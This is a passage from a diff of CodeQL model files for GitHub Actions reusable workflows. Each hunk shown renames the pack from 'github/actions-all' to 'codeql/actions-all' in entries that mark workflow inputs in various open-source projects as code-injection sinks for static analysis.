addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml index 7c72cb57dca6..2501e39f850a 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/ini/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml index 2e9681cb21eb..2a1fd972192a 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml index d30f1bb7bba0..46568f16fa6a 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml index 85771a98962a..0bba5671572e 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml index 194ac90b6482..37bd78f271d4 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml index d013a9c1b8f2..ebc6dfe01d21 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/node-which/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml index 57d88f541865..ab3c341b895e 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/nopt/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml index 312d9e193e7c..78f8e605665f 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml index b62903a97e93..d4d377730af0 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml index e983a4a6c985..d8cb45c66a74 100644 --- a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.base-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml index 4a45392e15d3..2fc426809c24 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml index ac20cdeeb3d7..eee7b011b0c2 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml index f6876b3bc56c..4dbaa756bc7d 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "input.project-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml index 9785efe9637c..f78ded292a5c 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml index 3197652aadc0..a0df95b6c756 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "input.success", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml index f0ebfa177242..0538073273c8 100644 
--- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "input.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml index 74afc5c0cc54..d2d543b9cf80 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "input.language", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml index fa145f6b6257..77c35145d4e4 100644 --- a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml index ab486b47df26..68433b763418 100644 
--- a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml index dc402bc1e458..c99b05845106 100644 --- a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.release_platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml index b5d4d6e4bde0..bbdee0166f80 100644 --- a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.package-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml index 83b45112b862..caccb0883390 100644 --- a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "input.survey_key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml index c40044c852ee..f2172a5aaef8 100644 --- a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "input.model_scope", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml index 011787908473..59e33f0b6527 100644 --- a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml index 9593323f325a..ee54a015ebbb 100644 --- a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml index 7901da27836d..5e750a24f30b 100644 --- a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.http-client", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml index ccb1bd246546..5622dd89b573 100644 --- a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "input.new_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml index 8317fdabab05..bd4406f24542 100644 --- a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "input.release-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml index 529e1576e748..748e317edff3 100644 --- a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "input.release-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml index d659fbc8089a..7bc475348144 100644 --- a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "input.build_configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml index 9ca03d9aee1b..060025b349b3 100644 --- a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml index 725487f10050..408d0b8b5240 100644 --- a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.pytest_test_directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml index 2bda8bb60a53..e24be2d0a21c 100644 --- a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "input.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml index e91b615cbe64..4e4140577982 100644 --- a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.tags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml index e09e461e605e..60c109da3e3f 100644 --- a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml index f8dd54aee14d..1ac813e5e7fc 100644 --- a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.os", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml index c4aaa28f00b1..13878976e43b 100644 --- a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.benchmark", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml index 546dac977a80..c66aff8690f7 100644 --- a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml index 3a072fd9f07c..b99f14b3c529 100644 --- a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "input.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml index 08a5f8fc58ea..aa7b4a1c9b81 100644 --- a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.ent-public-key", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml index 299c70daa54a..2689698d33b2 100644 --- a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["prql/prql/.github/workflows/test-rust.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml index 3e03b65cb8b0..3c9e6718f915 100644 --- a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml index 20eb977b973a..a91b3ed66a43 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "filename", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml index 4e58b2fa38cc..fcfee85a8dad 100644 
--- a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "input.ignore_dependency_check", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml index 6935bc7788d0..11d56b2b70b1 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "input.manifest-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml index 94d733fa0c4e..a824d844d866 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pyo3/pyo3/.github/workflows/build.yml", "*", "input.extra-features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml index 6b1214886fe4..a7427768bbe3 100644 --- a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "input.options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml index 4a97c50ad6e7..505bb0cad074 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml index a6e4c3473f26..0899d449725e 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pytorch/xla/.github/workflows/_test.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml index be72ba183574..89a0ccfdb85f 100644 --- 